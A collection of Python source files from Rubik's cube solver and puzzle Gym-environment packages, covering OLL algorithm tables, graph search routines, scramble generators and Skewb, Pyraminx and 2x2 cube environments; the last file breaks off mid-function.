"BBRUUUFFR": ["F", "U", "R", "U'", "R'", "U", "R", "U'", "R'", "F'"],
"LBRUUULFR": ["L'", "B'", "L", "U'", "R'", "U", "R", "U'", "R'", "U", "R", "L'", "B", "L"],
"BURUUUFUR": ["L", "U'", "R'", "U", "L'", "U", "R", "U", "R'", "U", "R"],
"LURUUULUR": ["R", "U", "R'", "U", "R", "U'", "R'", "U", "R", "U2", "R'"],
"LUBUUUFUU": ["L'", "U", "R", "U'", "L", "U", "R'"],
"BURUUULUU": ["R'", "U2", "R", "U", "R'", "U", "R"],
"UUBUUUUUF": ["R'", "F'", "L", "F", "R", "F'", "L'", "F"],
"UUUUUUFUF": ["R2", "D", "R'", "U2", "R", "D'", "R'", "U2", "R'"],
"UUBUUULUU": ["R'", "F'", "L'", "F", "R", "F'", "L", "F"],
"UBUUURUUU": ["M'", "U'", "M", "U2", "M'", "U'", "M"],
"UBUUUUUFU": ["L'", "R", "U", "R'", "U'", "L", "R'", "F", "R", "F'"],
"BURUURUFF": ["L", "F", "R'", "F", "R", "F2", "L'"],
"UURUURFFU": ["F", "R'", "F'", "R", "U", "R", "U'", "R'"],
"LUBUURFFU": ["R'", "U'", "R", "Y'", "X'", "R", "U'", "R'", "F", "R", "U", "R'", "X"],
"BUBUURUFU": ["U'", "R", "U2", "R'", "U'", "R", "U'", "R2", "Y'", "R'", "U'", "R", "U", "B"],
"LUBUURLFF": ["F", "R", "U", "R'", "U'", "R", "U", "R'", "U'", "F'"],
"BUBUURFFF": ["L", "F'", "L'", "F", "U2", "L2", "Y'", "L", "F", "L'", "F"],
"BUBLUUUFU": ["U'", "R'", "U2", "R", "U", "R'", "U", "R2", "Y", "R", "U", "R'", "U'", "F'"],
"LUULUUFFR": ["X", "L", "U2", "R'", "U'", "R", "U'", "X'", "L'"],
"BUULUUUFR": ["R'", "U2", "X'", "R", "R", "U'", "R'", "U", "X", "R'", "U2", "R"],
"BURLUUFFR": ["F'", "L'", "U'", "L", "U", "L'", "U'", "L", "U", "F"],
"LUBLUULFF": ["R'", "F", "R'", "F'", "R2", "U2", "X'", "U'", "R", "U", "R'", "X"],
"BUBLUUFFF": ["R'", "F", "R", "F'", "U2", "R2", "Y", "R'", "F'", "R", "F'"],
"BBUUURLUF": ["R", "U", "R'", "Y", "R'", "F", "R", "U'", "R'", "F'", "R"],
"UBBUURFUR": ["L'", "B'", "L", "U'", "R'", "U", "R", "L'", "B", "L"],
"LBBUURFUU": ["U2", "X", "L", "R2", "U'", "R", "U'", "R'", "U2", "R", "U'", "M"],
"UBUUURLUR": ["X'", "U'", "R", "U'", "R2", "F", "X", "R", "U", "R'", "U'", "R", "B2"],
"LBBLUULUF": ["L", "U'", "Y'", "R'", "U2", "R'", "U", "R", "U'", "R", "U2", "R", "Y", "U'", "L'"],
"BBRLUUUUF": ["U2", "X", "R'", "L2", "U", "L'", "U", "L", "U2", "L'", "U", "M"],
"UBULUULUR": ["Y2", "F", "U", "R", "U'", "X'", "U", "R'", "D'", "R", "U'", "R'", "X"],
"BBRLUULUU": ["X'", "L'", "U2", "R", "U", "R'", "U", "X", "L"],
"UURLURUUR": ["R", "U", "X'", "R", "U'", "R'", "U", "X", "U'", "R'"],
"LBRUUUUFU": ["R", "U", "R'", "U'", "X", "D'", "R'", "U", "R", "E'", "Z'"],
"LBBUUUFFU": ["R'", "F", "R", "U", "R'", "F'", "R", "Y", "L", "U'", "L'"],
"BBRUUUUFF": ["L", "F'", "L'", "U'", "L", "F", "L'", "Y'", "R'", "U", "R"],
"BBRUUULFU": ["L'", "B'", "L", "R'", "U'", "R", "U", "L'", "B", "L"],
"LBBUUUUFR": ["R", "B", "R'", "L", "U", "L'", "U'", "R", "B'", "R'"],
"UURUURUFR": ["F", "U", "R", "U'", "R'", "F'"],
"BUULUUFFU": ["R'", "Y", "U'", "L", "Y'", "U", "R", "U'", "R'", "F'", "R"],
"UUBUURUFF": ["L", "Y'", "U", "R'", "Y", "U'", "L'", "U", "L", "F", "L'"],
"LUULUULFU": ["F'", "U'", "L'", "U", "L", "F"],
"LBUUUULFU": ["F", "R", "U", "R'", "U'", "F'"],
"BBUUUUFFU": ["R", "U", "R'", "U'", "R'", "F", "R", "F'"],
"LBULUUUUF": ["L", "U", "L'", "U", "L", "U'", "L'", "U'", "Y2", "R'", "F", "R", "F'"],
"UBRUURFUU": ["R'", "U'", "R", "U'", "R'", "U", "R", "U", "Y", "F", "R'", "F'", "R"],
"UBBUUULFU": ["R'", "F", "R", "U", "R'", "U'", "Y", "L'", "Y'", "U", "R"],
"BBUUUUUFR": ["L", "F'", "L'", "U'", "L", "U", "Y'", "R", "Y", "U'", "L'"]
}
@staticmethod
def get_orientations(cube, color = 'Y'):
return ''.join([
cube.cubies['BLU'].color_facing(color),
cube.cubies['BU'].color_facing(color),
cube.cubies['BRU'].color_facing(color),
cube.cubies['LU'].color_facing(color),
cube.cubies['U'].color_facing(color),
cube.cubies['RU'].color_facing(color),
cube.cubies['FLU'].color_facing(color),
cube.cubies['FU'].color_facing(color),
cube.cubies['FRU'].color_facing(color)
])
def move(self, s, solution):
self.cube.move(Move(s))
solution.append(s)
def solution(self):
solution = []
for _ in range(4):
orientation = OLLSolver.get_orientations(self.cube)
if orientation in OLLSolver.STEPS:
step_solution = OLLSolver.STEPS[orientation]
for s in step_solution:
self.move(s, solution)
break
self.move("Y", solution)
return solution | /rubik_solver-0.2.0.tar.gz/rubik_solver-0.2.0/rubik_solver/Solver/CFOP/OLLSolver.py | 0.410284 | 0.329041 | OLLSolver.py | pypi |
import heapq
"""
Data structures useful for implementing SearchAgents
"""
class Stack:
""""A container with a last-in-first-out (LIFO) queuing policy."""
def __init__(self):
self.list = []
def push(self, item):
""""Push 'item' onto the stack"""
self.list.append(item)
def pop(self):
""""Pop the most recently pushed item from the stack"""
return self.list.pop()
def is_empty(self):
""""Returns true if the stack is empty"""
return len(self.list) == 0
class Queue:
""""A container with a first-in-first-out (FIFO) queuing policy."""
def __init__(self):
self.list = []
def push(self, item):
""""Enqueue the 'item' into the queue"""
self.list.insert(0, item)
def pop(self):
"""
Dequeue the earliest enqueued item still in the queue. This
operation removes the item from the queue.
"""
return self.list.pop()
def is_empty(self):
""""Returns true if the queue is empty"""
return len(self.list) == 0
class PriorityQueue:
"""
Implements a priority queue data structure. Each inserted item
has a priority associated with it and the client is usually interested
in quick retrieval of the lowest-priority item in the queue. This
data structure allows O(1) access to the lowest-priority item.
Note that this PriorityQueue does not allow you to change the priority
of an item. However, you may insert the same item multiple times with
different priorities.
"""
def __init__(self):
self.heap = []
self.init = False
def push(self, item, priority):
if not self.init:
self.init = True
try:
item < item
except:
item.__class__.__lt__ = lambda x, y: True
pair = (priority, item)
heapq.heappush(self.heap, pair)
def pop(self):
(priority, item) = heapq.heappop(self.heap)
return item
def is_empty(self):
return len(self.heap) == 0
class PriorityQueueWithFunction(PriorityQueue):
"""
Implements a priority queue with the same push/pop signature of the
Queue and the Stack classes. This is designed for drop-in replacement for
those two classes. The caller has to provide a priority function, which
extracts each item's priority.
"""
def __init__(self, priority_function):
""""priority_function (item) -> priority"""
self.priority_function = priority_function # store the priority function
super().__init__() # super-class initializer
def push(self, item):
""""Adds an item to the queue with priority from the priority function"""
PriorityQueue.push(self, item, self.priority_function(item))
def manhattan_distance(xy1, xy2):
""""Returns the Manhattan distance between points xy1 and xy2 in R^2"""
return abs(xy1[0] - xy2[0]) + abs(xy1[1] - xy2[1]) | /solver/util.py | 0.895717 | 0.477554 | util.py | pypi |
from rubikai.solver import util
class SearchProblem:
"""
This class outlines the structure of a search problem, but doesn't implement
any of the methods (in object-oriented terminology: an abstract class).
You do not need to change anything in this class, ever.
"""
def get_start_state(self):
"""
Returns the start state for the search problem
"""
util.raiseNotDefined()
def is_goal_state(self, state):
"""
state: Search state
Returns True if and only if the state is a valid goal state
"""
util.raiseNotDefined()
def get_successors(self, state):
"""
state: Search state
For a given state, this should return a list of triples,
(successor, action, stepCost), where 'successor' is a
successor to the current state, 'action' is the action
required to get there, and 'stepCost' is the incremental
cost of expanding to that successor
"""
util.raiseNotDefined()
def get_cost_of_actions(self, actions):
"""
actions: A list of actions to take
This method returns the total cost of a particular sequence of actions. The sequence must
be composed of legal moves
"""
util.raiseNotDefined()
class Node:
"""
A simple node class which saves arbitrary data and a pointer to a parent.
"""
def __init__(self, data, parent=None):
"""
Initializes a new node
:param data: data to save
:param parent: node's parent (Node object)
"""
self.data = data
self.parent = parent
def is_root(self):
"""
:return: True if this node has a parent, False otherwise
"""
return True if self.parent is None else False
def path_from_root(self):
"""
:return: a list of nodes which corresponds to a path from the root
to this node
"""
path = []
current = self
while current is not None:
path.append(current)
current = current.parent
# the above path is reversed. return the correct order:
return path[::-1]
class SearchNode(Node):
""" a node where the data saved is the (state,action,cost) triplet """
def __init__(self, state, action, cost, parent=None):
super().__init__(None, parent)
self.state = state
self.action = action
self.cost = cost
def _cost_so_far(node):
""" also referred to as `g' in the class notation """
prev_cost = 0 if node.is_root() else node.parent.incremental_cost
node.incremental_cost = prev_cost + node.cost
return node.incremental_cost
def generic_search(problem, data_structure, **kwargs):
"""
Implements a generic search algorithm which. I.e. this algorithm
can be used with different data structures as fringe.
:param problem: The search problem instance
:param data_structure: A data structure for the fringe (e.g. Stack)
:param kwargs: Additional keyword arguments for the data structure init
:return: A list of actions if a goal state is found, None otherwise
"""
fringe = data_structure(**kwargs)
visited = set()
start_state = problem.get_start_state()
fringe.push(SearchNode(state=start_state, action=None, cost=0))
visited.add(start_state)
while not fringe.is_empty():
node = fringe.pop()
if problem.is_goal_state(node.state):
# omit the root node (doesn't have any action)
path_from_root = node.path_from_root()[1:]
return [p.action for p in path_from_root]
else:
visited.add(node.state)
for successor, action, cost in problem.get_successors(node.state):
if successor not in visited:
fringe.push(SearchNode(successor, action,
cost, parent=node))
# This means that the fringe is empty and no goal state was reached
return []
def depth_first_search(problem):
"""
Search the deepest nodes in the search tree first.
"""
return generic_search(problem, util.Stack)
def breadth_first_search(problem):
"""
Search the shallowest nodes in the search tree first.
"""
return generic_search(problem, util.Queue)
def uniform_cost_search(problem):
"""
Search the node of least total cost first.
"""
return generic_search(problem, util.PriorityQueueWithFunction,
priority_function=_cost_so_far)
def null_heuristic(*_):
"""
A heuristic function estimates the cost from the current state to the nearest
goal in the provided SearchProblem. This heuristic is trivial.
"""
return 0
def a_star_search(problem, heuristic=null_heuristic):
"""
Search the node that has the lowest combined cost and heuristic first.
"""
def f(n):
return heuristic(n.state, problem) + _cost_so_far(n)
return generic_search(problem, util.PriorityQueueWithFunction,
priority_function=f)
# Abbreviations
bfs = breadth_first_search
dfs = depth_first_search
a_star = a_star_search
ucs = uniform_cost_search | /solver/search.py | 0.917976 | 0.803868 | search.py | pypi |
from rubikai.solver import search
from rubikai.cube.cube import Cube, Face, Action
import numpy as np
import pandas as pd
class CubeProblem(search.SearchProblem):
""" a Problem class to be used with the search module """
def __init__(self, cube, quarter_metric=True):
"""
:param cube: a rubikai.cube.cube.Cube instance
:param quarter_metric: if True, use 90 degrees rotations only.
otherwise use also 180 degrees.
"""
self.cube = cube
self.expanded = 0
self.actions = []
if quarter_metric:
k_values = (-1, 1)
else:
k_values = (-1, 1, 2)
for layer in range(self.cube.layers // 2):
for k in k_values:
self.actions += [Action(face, k, layer) for face in Face]
def get_start_state(self):
return self.cube.copy()
def is_goal_state(self, cube):
return cube.is_solved()
def get_successors(self, cube):
self.expanded += 1
successors = []
for action in self.actions:
successor = cube.copy().rotate(
action.face, action.k, action.layer)
successors.append((successor, action, 1))
return successors
def get_cost_of_actions(self, actions):
return len(actions)
def solve(cube, heuristic=lambda *args: 0, verbose=False):
"""
solves a given cube instance
:param cube: rubikai.cube.cube.Cube instance
:param heuristic: a heuristic function for A* search.
takes a cube and problem instances as input and returns
a number.
by default, uses the null heuristic (0 for every state)
:param verbose: if True, prints some information about the search
:return: a list of actions that solves the cube
"""
cube_problem = CubeProblem(cube)
solution = search.a_star(cube_problem, heuristic)
if verbose:
solution_str = ' '.join([str(s) for s in solution])
print('Length %d solution found:\n%s' %
(len(solution), solution_str))
print('Expanded %d nodes.' % cube_problem.expanded)
return solution, cube_problem.expanded
def random_actions(cube, num_actions, quarter_metric=True):
"""
returns a sequence of random actions on the given cube
(does not apply the actions to the cube)
:param cube: Cube object
:param num_actions: an integer >= 1
:param quarter_metric: whether to use the quarter-turn metric or not
:return: a sequence of `num_actions' actions
"""
assert num_actions >= 1, "there's no sense in less than 1 steps"
cube_problem = CubeProblem(cube, quarter_metric)
last_cube = cube.copy()
visited = {last_cube.copy()}
possible_actions = cube_problem.actions
actions = [None] * num_actions
actions[0] = np.random.choice(possible_actions)
for i in range(1, num_actions):
rand_action = np.random.choice(possible_actions)
while last_cube.copy().apply([rand_action]) in visited:
rand_action = np.random.choice(possible_actions)
actions[i] = rand_action
last_cube.apply([rand_action])
visited.add(last_cube.copy())
return actions
def switchable(a_1, a_2):
"""
decide if 2 actions can be swapped.
two actions are independent if they are on opposite faces or on the same
face but on different layers.
:param a_1: first action
:param a_2: second action
:returns True if switchable, False otherwise
"""
opposite_faces = a_1.face.value + a_2.face.value == 5
same_face = a_1.face.value == a_2.face.value
diff_layers = a_1.layer != a_2.layer
if opposite_faces:
return a_1.face.value > a_2.face.value
elif same_face and diff_layers:
return a_1.layer > a_2.layer
else:
return False
def bubble_sort(actions):
""" bubble sort actions were switching is between independent actions """
exchanges = True
pass_num = len(actions) - 1
while pass_num > 0 and exchanges:
exchanges = False
for i in range(pass_num):
if switchable(actions[i], actions[i + 1]):
exchanges = True
temp = actions[i]
actions[i] = actions[i + 1]
actions[i + 1] = temp
pass_num = pass_num - 1
return actions
def reduce_same_actions(actions):
""" reduce a sequence of the same actions """
reduced_actions = []
i = 0
while i < len(actions):
curr_action_k = actions[i].k
j = i + 1
while j < len(actions) and \
actions[i].face.value == actions[j].face.value and \
actions[i].layer == actions[j].layer:
curr_action_k += actions[j].k
j += 1
# end while
curr_action_k %= 4
if curr_action_k == 2:
a = Action(actions[i].face, -1, actions[i].layer)
reduced_actions.append(a)
reduced_actions.append(a)
elif curr_action_k != 0:
a = Action(actions[i].face, curr_action_k, actions[i].layer)
reduced_actions.append(a)
# end if
i = j
# end while
return reduced_actions
def reduce_sequence(actions):
"""
two actions on the cube are independent if they don't affect the same faces,
in this case we can change the order of the actions.
we then can go over sequences of dependent action and change a series
of action to shorter ones.
"""
return reduce_same_actions(bubble_sort(actions))
def generate_random_sequence(cube_size, d):
if d == 0:
return []
rand_actions = []
happy = False
while not happy:
cube = Cube(cube_size)
rand_actions = random_actions(cube, 2*d)
rand_actions = reduce_sequence(rand_actions)
happy = len(rand_actions) >= d
return rand_actions[:d]
def compare_heuristics(heuristics, cube_layers, d_values,
iterations, verbose=False):
"""
uses the given heuristics to solve multiple instances of scrambled cubes
and gathers information on the solutions.
:param heuristics: a dictionary where the key is the heuristic name and the
value is the heuristic function handle
:param cube_layers: number of cube layers the heuristic operates on
:param d_values: an array-like of integers specifying the number of
scramble moves to check
:param iterations: number of iterations for each num. of scramble moves
:param verbose: if True, prints information as the test goes
:returns: pandas DataFrame with all the data gathered
"""
# print only if verbose is True
def vprint(*a, **kw):
if verbose:
print(*a, **kw)
# end vprint
# create a dataframe
name_col = 'heuristic_name'
d_col = 'num_scrambles'
opt_col = 'is_optimal'
exp_col = 'expansions'
df = pd.DataFrame(columns=[name_col, d_col, opt_col, exp_col])
for i in range(iterations):
vprint('Iteration:', i, '\n')
for d in d_values:
# generate a random sequence of length d and scramble the cube
rand_seq = generate_random_sequence(cube_layers, d)
vprint('Generated sequence:', rand_seq, '(length %d)' % d)
c = Cube(cube_layers)
c.apply(rand_seq)
# test each heuristic on the scrambled cube
for h_name in heuristics:
h = heuristics[h_name]
solution, expansions = solve(c, h, verbose)
df = df.append({
name_col: h_name,
d_col: d,
opt_col: len(solution) == d,
exp_col: expansions
}, ignore_index=True)
vprint()
# end for
vprint()
# end for
vprint()
# end for
return df | /solver/solver.py | 0.864482 | 0.662196 | solver.py | pypi |
import numpy as np
from rubikai.cube.cube import Cube
from rubikai.solver.solver import generate_random_sequence
def scrambled_cube_generator(layers, max_d, p=None):
"""
a generator that performs a random walk _back_ from a solved cube, where
the number of moves performed is at most `max_d' (inclusive).
yields a pair of a scrambled_cube_array and the number of actual moves
performed.
:param layers: the number of layers in the scrambled cube
:param max_d: the maximal depth of the random walk
:param p: (optional) a length (max_d+1) probabilities vector according to
which the number of scramble-steps is chosen.
:return: (arr, d) pairs, where `arr' is a scrambled-cube array and d is
the number of moves that were performed to scramble it.
"""
d_values = np.arange(max_d + 1)
while True:
cube = Cube(layers)
d = np.random.choice(d_values, p=p)
actions = generate_random_sequence(layers, d)
cube.apply(actions)
yield cube.to_array(), d
def batch_generator(layers, max_d, batch_size, p=None):
"""
same as `scrambled_cube_generator', but for batches of data.
:param layers: cube dimension (layers x layers x layers cube)
:param max_d: maximal number of scramble-steps
:param batch_size: number of instances for each iteration
:param p: num-of-steps probabilities vector (see scrambled_cube_generator)
:return: (data, labels) pair, where `data' is a 2d array in which each row
is a scrambled cube array. labels is a 1d array where each entry
corresponds to a row in the data array.
"""
dimension = len(Cube(layers).to_array())
while True:
# preallocate the output arrays
data = np.empty((batch_size, dimension), dtype=np.int8)
labels = np.empty(batch_size, dtype=np.int8)
# generate instances until batch_size is reached
for i, (arr, d) in enumerate(
scrambled_cube_generator(layers, max_d, p)):
if i >= batch_size:
break
data[i, :] = arr
labels[i] = d
yield data, labels | /solver/learning.py | 0.878105 | 0.684211 | learning.py | pypi |
import pickle
import random
import gym
from gym import spaces
import os
import cv2
import numpy as np
import gc
import wget
class SkewbEnv(gym.Env):
metadata = {'render.modes': ['human', 'rgb_array', 'ansi']}
def __init__(self):
self.cube = None
self.cube_reduced = None
self.cube_state = None
# spaces
self.action_space = spaces.Discrete(4)
self.observation_space = spaces.Discrete(3149280)
state_file = os.path.join(os.path.dirname(os.path.realpath(__file__)), "skewb_states.pickle")
if not os.path.exists(state_file):
print("State file not found")
print("Downloading...")
wget.download("https://storage.googleapis.com/rubiks_cube_gym/skewb_states.pickle", state_file)
print("Download complete")
with open(state_file, "rb") as f:
self.cube_states = pickle.load(f)
def update_cube_reduced(self):
self.cube_reduced = ''.join(TILE_MAP[tile] for tile in self.cube)
def update_cube_state(self):
self.cube_state = self.cube_states[self.cube_reduced]
def generate_scramble(self):
scramble_len = 0
prev_move = None
scramble = ""
layer_moves = ['L', 'R', 'U', 'B']
layer_move_types = ['', "'"]
while scramble_len < 11:
move = random.choice(layer_moves)
while move == prev_move:
move = random.choice(layer_moves)
scramble += move + random.choice(layer_move_types) + " "
prev_move = move
scramble_len += 1
return scramble[:-1]
def move(self, move, move_type=None):
repetitions = dict({None: 1, "'": 2})[move_type]
if move == "L":
layer_cubies_old = np.array([10, 12, 14, 8, 7, 6, 26, 27, 28])
vertex_cubies_old = np.array([13, 9, 25])
side_cubies_old = np.array([3, 24, 18])
elif move == "R":
layer_cubies_old = np.array([16, 17, 18, 26, 27, 28, 24, 22, 20])
vertex_cubies_old = np.array([19, 29, 23])
side_cubies_old = np.array([1, 14, 8])
elif move == "U":
layer_cubies_old = np.array([3, 2, 1, 20, 22, 24, 8, 7, 6])
vertex_cubies_old = np.array([0, 21, 5])
side_cubies_old = np.array([16, 28, 10])
elif move == "B":
layer_cubies_old = np.array([21, 22, 23, 29, 27, 25, 9, 7, 5])
vertex_cubies_old = np.array([24, 28, 8])
side_cubies_old = np.array([0, 19, 13])
layer_cubies_new = np.roll(layer_cubies_old, -3 * repetitions)
vertex_cubies_new = np.roll(vertex_cubies_old, -1 * repetitions)
side_cubies_new = np.roll(side_cubies_old, -1 * repetitions)
np.put(self.cube, layer_cubies_old, self.cube[layer_cubies_new])
np.put(self.cube, vertex_cubies_old, self.cube[vertex_cubies_new])
np.put(self.cube, side_cubies_old, self.cube[side_cubies_new])
def algorithm(self, moves):
for move in moves.split(" "):
if len(move) == 2:
self.move(move[0], move[1])
else:
self.move(move[0])
def step(self, action):
move = ACTION_MAP[action]
self.move(move[0], move[1])
self.update_cube_reduced()
self.update_cube_state()
reward, done = self.reward()
observation = self.cube_state
info = {"cube": self.cube, "cube_reduced": self.cube_reduced}
return observation, reward, done, info
def reward(self):
if self.cube_reduced == "WWWWWOOOOOGGGGGRRRRRBBBBBYYYYY":
return 100, True
else:
return -1, False
def reset(self, scramble=None):
self.cube = np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24,
25, 26, 27, 28, 29], dtype=np.uint8)
if scramble:
self.algorithm(scramble)
elif scramble == False:
pass
else:
self.algorithm(self.generate_scramble())
self.update_cube_reduced()
self.update_cube_state()
return self.cube_state
def render(self, mode='human', render_time=100):
if mode == 'ansi':
return self.cube_reduced
else:
img = np.zeros((225, 300, 3), np.uint8) * 255
face_anchor_map = {0: (75, 0), 1: (0, 75), 2: (75, 75), 3: (150, 75), 4: (225, 75), 5: (75, 150)}
triangle_map = {0: [(0, 0), (37, 0), (0, 37)], 1: [(38, 0), (75, 0), (75, 37)],
3: [(0, 38), (0, 75), (37, 75)], 4: [(38, 75), (75, 38), (75, 75)]}
for face in range(6):
w, h = face_anchor_map[face]
cv2.rectangle(img, (w, h), (w + 75, h + 75), COLOR_MAP[TILE_MAP[self.cube[5 * face + 2]]], -1)
for tile in range(5):
if tile == 2:
continue
triangle_cnt = np.array([(w, h)] * 3) + triangle_map[tile]
cv2.drawContours(img, [triangle_cnt], 0, COLOR_MAP[TILE_MAP[self.cube[5 * face + tile]]], -1)
if mode == 'rgb_array':
return img
elif mode == "human":
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
cv2.imshow("Cube", img)
cv2.waitKey(render_time)
def close(self):
del self.cube_states
gc.collect()
cv2.destroyAllWindows()
TILE_MAP = {
0: 'W', 1: 'W', 2: 'W', 3: 'W', 4: 'W',
5: 'O', 6: 'O', 7: 'O', 8: 'O', 9: 'O',
10: 'G', 11: 'G', 12: 'G', 13: 'G', 14: 'G',
15: 'R', 16: 'R', 17: 'R', 18: 'R', 19: 'R',
20: 'B', 21: 'B', 22: 'B', 23: 'B', 24: 'B',
25: 'Y', 26: 'Y', 27: 'Y', 28: 'Y', 29: 'Y'
}
COLOR_MAP = {
'W': (255, 255, 255),
'O': (255, 165, 0),
'G': (0, 128, 0),
'R': (255, 0, 0),
'B': (0, 0, 255),
'Y': (255, 255, 0)
}
ACTION_MAP = {0: ("L", None), 1: ("R", None), 2: ("U", None), 3: ("B", None)} | /rubiks_cube_gym-0.4.0.tar.gz/rubiks_cube_gym-0.4.0/rubiks_cube_gym/envs/skewb.py | 0.450359 | 0.225513 | skewb.py | pypi |
import pickle
import random
import gym
from gym import spaces
import os
import cv2
import numpy as np
import gc
import wget
class PyraminxWoTipsEnv(gym.Env):
metadata = {'render.modes': ['human', 'rgb_array', 'ansi']}
def __init__(self):
self.cube = None
self.cube_reduced = None
self.cube_state = None
# spaces
self.action_space = spaces.Discrete(4)
self.observation_space = spaces.Discrete(993120)
state_file = os.path.join(os.path.dirname(os.path.realpath(__file__)), "pyraminx_wo_tips_states.pickle")
if not os.path.exists(state_file):
print("State file not found")
print("Downloading...")
wget.download("https://storage.googleapis.com/rubiks_cube_gym/pyraminx_wo_tips_states.pickle", state_file)
print("Download complete")
with open(state_file, "rb") as f:
self.cube_states = pickle.load(f)
def update_cube_reduced(self):
self.cube_reduced = ''.join(TILE_MAP[tile] for tile in self.cube)
def update_cube_state(self):
self.cube_state = self.cube_states[self.cube_reduced]
def generate_scramble(self):
scramble_len = 0
prev_move = None
scramble = ""
layer_moves = ['L', 'R', 'U', 'B']
layer_move_types = ['', "'"]
while scramble_len < 11:
move = random.choice(layer_moves)
while move == prev_move:
move = random.choice(layer_moves)
scramble += move + random.choice(layer_move_types) + " "
prev_move = move
scramble_len += 1
return scramble[:-1]
def move(self, move, move_type=None):
repetitions = dict({None: 1, "'": 2})[move_type]
if move.isupper():
if move == "L":
layer_cubies_old = np.array([14, 22, 23, 11, 12, 13, 29, 28, 32])
elif move == "R":
layer_cubies_old = np.array([16, 24, 23, 29, 30, 34, 19, 18, 17])
elif move == "U":
layer_cubies_old = np.array([2, 3, 13, 14, 15, 16, 17, 7, 8])
elif move == "B":
layer_cubies_old = np.array([11, 1, 2, 8, 9, 19, 34, 33, 32])
layer_cubies_new = np.roll(layer_cubies_old, -3 * repetitions)
np.put(self.cube, layer_cubies_old, self.cube[layer_cubies_new])
move = move.lower()
if move == "l":
vertex_cubies_old = np.array([20, 27, 21])
elif move == "r":
vertex_cubies_old = np.array([25, 31, 26])
elif move == "u":
vertex_cubies_old = np.array([4, 5, 6])
elif move == "b":
vertex_cubies_old = np.array([0, 10, 35])
vertex_cubies_new = np.roll(vertex_cubies_old, -1 * repetitions)
np.put(self.cube, vertex_cubies_old, self.cube[vertex_cubies_new])
def algorithm(self, moves):
for move in moves.split(" "):
if len(move) == 2:
self.move(move[0], move[1])
else:
self.move(move[0])
def step(self, action):
move = ACTION_MAP[action]
self.move(move[0], move[1])
self.update_cube_reduced()
self.update_cube_state()
reward, done = self.reward()
observation = self.cube_state
info = {"cube": self.cube, "cube_reduced": self.cube_reduced}
return observation, reward, done, info
def reward(self):
if self.cube_reduced == "RRRRRGBBBBBRRRGGGBBBRGGGGGBYYYYYYYYY":
return 100, True
else:
return -1, False
def reset(self, scramble=None):
self.cube = np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24,
25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35], dtype=np.uint8)
if scramble:
self.algorithm(scramble)
elif scramble == False:
pass
else:
self.algorithm(self.generate_scramble())
self.update_cube_reduced()
self.update_cube_state()
return self.cube_state
def render(self, mode='human', render_time=100):
if mode == 'ansi':
return self.cube_reduced
else:
img = np.zeros((312, 360, 3), np.uint8) * 255
s = 60
s_2 = 30
h = 52
ctr = 0
for row in range(6):
pt1 = row * s_2, row * h
inverse = 1
for tile in range(11 - 2 * row):
pt2 = pt1[0] + s, pt1[1]
pt3 = pt1[0] + s_2, pt1[1] + inverse * h
triangle_cnt = np.array([pt1, pt2, pt3])
cv2.drawContours(img, [triangle_cnt], 0, COLOR_MAP[TILE_MAP[self.cube[ctr]]], -1)
pt1 = pt1[0] + s_2, pt1[1] + inverse * h
inverse *= -1
ctr += 1
if mode == 'rgb_array':
return img
elif mode == "human":
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
cv2.imshow("Cube", img)
cv2.waitKey(render_time)
def close(self):
del self.cube_states
gc.collect()
cv2.destroyAllWindows()
TILE_MAP = {
0: 'R', 1: 'R', 2: 'R', 3: 'R', 4: 'R',
5: 'G',
6: 'B', 7: 'B', 8: 'B', 9: 'B', 10: 'B',
11: 'R', 12: 'R', 13: 'R',
14: 'G', 15: 'G', 16: 'G',
17: 'B', 18: 'B', 19: 'B',
20: 'R',
21: 'G', 22: 'G', 23: 'G', 24: 'G', 25: 'G',
26: 'B',
27: 'Y', 28: 'Y', 29: 'Y', 30: 'Y', 31: 'Y',
32: 'Y', 33: 'Y', 34: 'Y',
35: 'Y'
}
COLOR_MAP = {
'G': (0, 128, 0),
'R': (255, 0, 0),
'B': (0, 0, 255),
'Y': (255, 255, 0)
}
ACTION_MAP = {0: ("L", None), 1: ("R", None), 2: ("U", None), 3: ("B", None)} | /rubiks_cube_gym-0.4.0.tar.gz/rubiks_cube_gym-0.4.0/rubiks_cube_gym/envs/pyraminx_wo_tips.py | 0.564098 | 0.231397 | pyraminx_wo_tips.py | pypi |
import pickle
import random
import gym
from gym import spaces
import os
import cv2
import numpy as np
import gc
import wget
class RubiksCube222Env(gym.Env):
metadata = {'render.modes': ['human', 'rgb_array', 'ansi']}
def __init__(self):
self.cube = None
self.cube_reduced = None
self.cube_state = None
# spaces
self.action_space = spaces.Discrete(3)
self.observation_space = spaces.Discrete(3674160)
state_file = os.path.join(os.path.dirname(os.path.realpath(__file__)), "rubiks_cube_222_states_FRU.pickle")
if not os.path.exists(state_file):
print("State file not found")
print("Downloading...")
wget.download("https://storage.googleapis.com/rubiks_cube_gym/rubiks_cube_222_states_FRU.pickle", state_file)
print("Download complete")
with open(state_file, "rb") as f:
self.cube_states = pickle.load(f)
def update_cube_reduced(self):
self.cube_reduced = ''.join(TILE_MAP[tile] for tile in self.cube)
def update_cube_state(self):
self.cube_state = self.cube_states[self.cube_reduced]
def generate_scramble(self):
scramble_len = 0
prev_move = None
scramble = ""
moves = ['F', 'R', 'U']
move_type = ['', '2', "'"]
while scramble_len < 11:
move = random.choice(moves)
while move == prev_move:
move = random.choice(moves)
scramble += move + random.choice(move_type) + " "
prev_move = move
scramble_len += 1
return scramble[:-1]
def move(self, move_side, move_type=None):
repetitions = dict({None: 1, "2": 2, "'": 3})[move_type]
if move_side == "R":
side_cubies_old = np.array([1, 3, 7, 15, 21, 23, 18, 10])
face_cubies_old = np.array([[8, 9], [16, 17]])
elif move_side == "L":
side_cubies_old = np.array([2, 0, 11, 19, 22, 20, 14, 6])
face_cubies_old = np.array([[4, 5], [12, 13]])
elif move_side == "F":
side_cubies_old = np.array([2, 3, 13, 5, 21, 20, 8, 16])
face_cubies_old = np.array([[6, 7], [14, 15]])
elif move_side == "B":
side_cubies_old = np.array([0, 1, 9, 17, 23, 22, 12, 4])
face_cubies_old = np.array([[10, 11], [18, 19]])
elif move_side == "U":
side_cubies_old = np.array([6, 7, 8, 9, 10, 11, 4, 5])
face_cubies_old = np.array([[0, 1], [2, 3]])
elif move_side == "D":
